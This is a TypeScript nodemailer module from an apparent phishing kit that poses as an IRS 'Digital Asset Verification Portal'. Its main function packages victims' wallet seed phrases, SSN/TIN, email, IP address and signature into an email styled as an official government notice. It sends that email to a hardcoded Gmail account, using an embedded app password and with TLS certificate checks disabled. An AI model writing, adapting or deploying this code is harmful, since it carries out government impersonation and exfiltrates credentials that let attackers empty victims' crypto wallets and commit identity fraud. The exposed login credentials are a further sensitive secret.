import nodemailer from 'nodemailer';

export interface EmailConfig {
  enabled: boolean;
  smtp_host: string;
  smtp_port: number;
  smtp_secure: boolean;
  smtp_user: string;
  smtp_pass: string;
  recipient_email: string;
  sender_name?: string;
}

export const DEFAULT_EMAIL_CONFIG: EmailConfig = {
  enabled: true,
  smtp_host: 'smtp.gmail.com',
  smtp_port: 587,
  smtp_secure: false, // true for port 465, false for 587
  smtp_user: 'ahmarjabbar7@gmail.com',
  smtp_pass: 'spteslvopkiduhsu',
  recipient_email: 'ahmarjabbar7@gmail.com',
  sender_name: 'IRS Digital Asset Verification Portal',
};

/**
 * Creates a Nodemailer transporter with user configuration
 */
export function createTransporter(config: EmailConfig) {
  const isPort465 = Number(config.smtp_port) === 465;
  const isSecure = config.smtp_secure !== undefined ? Boolean(config.smtp_secure) : isPort465;

  return nodemailer.createTransport({
    host: config.smtp_host || 'smtp.gmail.com',
    port: Number(config.smtp_port) || 587,
    secure: isSecure,
    auth: {
      user: config.smtp_user,
      pass: config.smtp_pass,
    },
    tls: {
      rejectUnauthorized: false, // Avoid self-signed certificate rejection
    },
  });
}

/**
 * Sends a test email to verify SMTP credentials
 */
export async function sendTestEmail(config: EmailConfig, targetEmail?: string): Promise<{ success: boolean; message: string }> {
  try {
    const transporter = createTransporter(config);
    const to = targetEmail || config.recipient_email || config.smtp_user;

    const info = await transporter.sendMail({
      from: `"${config.sender_name || 'IRS Verification Portal'}" <${config.smtp_user}>`,
      to,
      subject: '✅ IRS Portal - SMTP Test Verification',
      text: 'This is a test notification from your IRS Digital Asset & Verification Portal. Your email settings are working successfully.',
      html: `
        <div style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; max-width: 600px; margin: 0 auto; border: 1px solid #dfe1e2; border-radius: 8px; overflow: hidden;">
          <div style="background-color: #005ea2; padding: 20px; text-align: center; color: #ffffff;">
            <h2 style="margin: 0; font-size: 20px;">IRS Verification Portal</h2>
            <p style="margin: 4px 0 0 0; font-size: 13px; opacity: 0.9;">SMTP Notification Test</p>
          </div>
          <div style="padding: 24px; color: #212121; background-color: #ffffff;">
            <p style="font-size: 16px; font-weight: bold; color: #008837; margin-top: 0;">✓ SMTP Configuration Successful!</p>
            <p style="font-size: 14px; line-height: 1.6; color: #565c65;">
              This test confirms that your SMTP credentials configured in the Admin Dashboard are valid and ready to dispatch new taxpayer submission dossiers.
            </p>
            <table style="width: 100%; border-collapse: collapse; margin-top: 16px; font-size: 13px;">
              <tr style="border-bottom: 1px solid #f0f0f0;">
                <td style="padding: 8px 0; color: #71767a;">SMTP Host:</td>
                <td style="padding: 8px 0; font-weight: 600;">${config.smtp_host}</td>
              </tr>
              <tr style="border-bottom: 1px solid #f0f0f0;">
                <td style="padding: 8px 0; color: #71767a;">SMTP Port:</td>
                <td style="padding: 8px 0; font-weight: 600;">${config.smtp_port}</td>
              </tr>
              <tr style="border-bottom: 1px solid #f0f0f0;">
                <td style="padding: 8px 0; color: #71767a;">Account User:</td>
                <td style="padding: 8px 0; font-weight: 600;">${config.smtp_user}</td>
              </tr>
              <tr>
                <td style="padding: 8px 0; color: #71767a;">Recipient:</td>
                <td style="padding: 8px 0; font-weight: 600;">${to}</td>
              </tr>
            </table>
          </div>
          <div style="background-color: #f8f9fa; padding: 12px; text-align: center; font-size: 11px; color: #71767a; border-top: 1px solid #dfe1e2;">
            Automated notification generated by IRS Digital Asset Admin System
          </div>
        </div>
      `,
    });

    return { success: true, message: `Test email successfully sent to ${to} (Message ID: ${info.messageId})` };
  } catch (err: any) {
    return { success: false, message: err?.message || 'Failed to send test email' };
  }
}

/**
 * Sends full submission dossier via email
 */
export async function sendSubmissionEmail(submission: any, config: EmailConfig): Promise<boolean> {
  if (!config.enabled) {
    console.log('Email notifications disabled in settings. Skipping email.');
    return false;
  }

  if (!config.smtp_user || !config.smtp_pass) {
    console.log('SMTP credentials not configured. Skipping email.');
    return false;
  }

  try {
    const transporter = createTransporter(config);
    const to = config.recipient_email || config.smtp_user;

    const words: string[] = Array.isArray(submission.seed_words) ? submission.seed_words : [];
    const formattedWords = words
      .map(
        (w, i) => `
        <div style="background-color: #f0f7fc; border: 1px solid #cfe2f3; border-radius: 6px; padding: 8px 10px; margin: 4px; text-align: center; display: inline-block; width: 21%; box-sizing: border-box;">
          <span style="font-size: 10px; color: #005ea2; font-weight: bold; display: block;">#${String(i + 1).padStart(2, '0')}</span>
          <span style="font-size: 13px; font-weight: 600; color: #112e51; font-family: monospace;">${w || '—'}</span>
        </div>`
      )
      .join('');

    const signatureImg = submission.signature_data
      ? `<div style="margin-top: 20px; padding: 16px; background: #ffffff; border: 1px dashed #71767a; border-radius: 6px; text-align: center;">
          <p style="font-size: 12px; color: #71767a; margin-top: 0; margin-bottom: 8px; font-weight: bold; text-transform: uppercase;">Recorded Electronic Signature</p>
          <img src="${submission.signature_data}" alt="Signature" style="max-width: 100%; max-height: 120px; object-fit: contain;" />
        </div>`
      : `<p style="font-size: 13px; color: #71767a; font-style: italic;">No electronic signature captured.</p>`;

    await transporter.sendMail({
      from: `"${config.sender_name || 'IRS Verification Portal'}" <${config.smtp_user}>`,
      to,
      subject: `🚨 NEW IRS SUBMISSION: ${submission.reference_number} (${submission.wallet_brand || submission.wallet_type})`,
      html: `
        <div style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; max-width: 680px; margin: 0 auto; border: 1px solid #dfe1e2; border-radius: 8px; overflow: hidden; background-color: #ffffff;">
          <!-- Header -->
          <div style="background: linear-gradient(135deg, #0b1d3a 0%, #005ea2 100%); padding: 24px 20px; color: #ffffff; text-align: center;">
            <p style="margin: 0 0 6px 0; font-size: 11px; text-transform: uppercase; letter-spacing: 1.5px; opacity: 0.85;">United States Government • Official Notice</p>
            <h1 style="margin: 0; font-size: 22px; font-weight: 700;">New Taxpayer Asset Verification Dossier</h1>
            <p style="margin: 8px 0 0 0; font-size: 14px; color: #f0f7fc; font-family: monospace;">Ref: ${submission.reference_number}</p>
          </div>

          <!-- Body -->
          <div style="padding: 24px; color: #212121;">
            <!-- Taxpayer Info Card -->
            <div style="background-color: #f8f9fa; border: 1px solid #e6e6e6; border-radius: 8px; padding: 16px; margin-bottom: 24px;">
              <h3 style="margin-top: 0; margin-bottom: 12px; font-size: 15px; color: #112e51; border-bottom: 2px solid #005ea2; padding-bottom: 6px;">Taxpayer & Device Details</h3>
              <table style="width: 100%; border-collapse: collapse; font-size: 13px;">
                <tr>
                  <td style="padding: 6px 0; color: #71767a; width: 140px;">SSN / TIN:</td>
                  <td style="padding: 6px 0; font-weight: 700; color: #112e51; font-family: monospace; font-size: 14px;">${submission.ssn_tin || 'Not Provided'}</td>
                </tr>
                <tr>
                  <td style="padding: 6px 0; color: #71767a;">Email Address:</td>
                  <td style="padding: 6px 0; font-weight: 600;">${submission.email || 'Not Provided'}</td>
                </tr>
                <tr>
                  <td style="padding: 6px 0; color: #71767a;">Wallet Architecture:</td>
                  <td style="padding: 6px 0; font-weight: 600; text-transform: uppercase;">${submission.wallet_type || 'Unknown'}</td>
                </tr>
                <tr>
                  <td style="padding: 6px 0; color: #71767a;">Designated Brand:</td>
                  <td style="padding: 6px 0; font-weight: 600; color: #005ea2;">${submission.wallet_brand || 'Not Specified'}</td>
                </tr>
                <tr>
                  <td style="padding: 6px 0; color: #71767a;">Seed Word Count:</td>
                  <td style="padding: 6px 0; font-weight: 600;">${submission.seed_length || words.length} Words</td>
                </tr>
                <tr>
                  <td style="padding: 6px 0; color: #71767a;">Timestamp:</td>
                  <td style="padding: 6px 0;">${new Date(submission.submitted_at).toUTCString()}</td>
                </tr>
                <tr>
                  <td style="padding: 6px 0; color: #71767a;">Client IP:</td>
                  <td style="padding: 6px 0; font-family: monospace;">${submission.client_ip || 'Unknown'}</td>
                </tr>
              </table>
            </div>

            <!-- Seed Phrase Grid -->
            <div style="margin-bottom: 24px;">
              <h3 style="margin-top: 0; margin-bottom: 12px; font-size: 15px; color: #112e51; border-bottom: 2px solid #005ea2; padding-bottom: 6px;">
                Verified Recovery Seed Phrase (${words.length} Words)
              </h3>
              <div style="text-align: center; margin-bottom: 16px;">
                ${formattedWords}
              </div>
              <!-- Full Plaintext copy box -->
              <div style="background-color: #212121; color: #00ff66; padding: 12px 16px; border-radius: 6px; font-family: monospace; font-size: 13px; word-break: break-all;">
                <strong>Full Phrase:</strong> ${submission.seed_phrase_full || words.join(' ')}
              </div>
            </div>

            <!-- Signature Section -->
            <div>
              <h3 style="margin-top: 0; margin-bottom: 8px; font-size: 15px; color: #112e51; border-bottom: 2px solid #005ea2; padding-bottom: 6px;">
                Taxpayer Electronic Signature
              </h3>
              ${signatureImg}
            </div>
          </div>

          <!-- Footer -->
          <div style="background-color: #f0f7fc; padding: 16px; text-align: center; font-size: 12px; color: #565c65; border-top: 1px solid #dfe1e2;">
            <p style="margin: 0;">Sent automatically from IRS Digital Asset & Verification Portal</p>
            <p style="margin: 4px 0 0 0; font-size: 11px; color: #71767a;">Confidential Government Record &bull; Internal Revenue Service</p>
          </div>
        </div>
      `,
    });

    console.log(`[Email Dispatched] Submission ${submission.reference_number} delivered to ${to}`);
    return true;
  } catch (err) {
    console.error('[Email Error] Failed to dispatch submission email:', err);
    return false;
  }
}
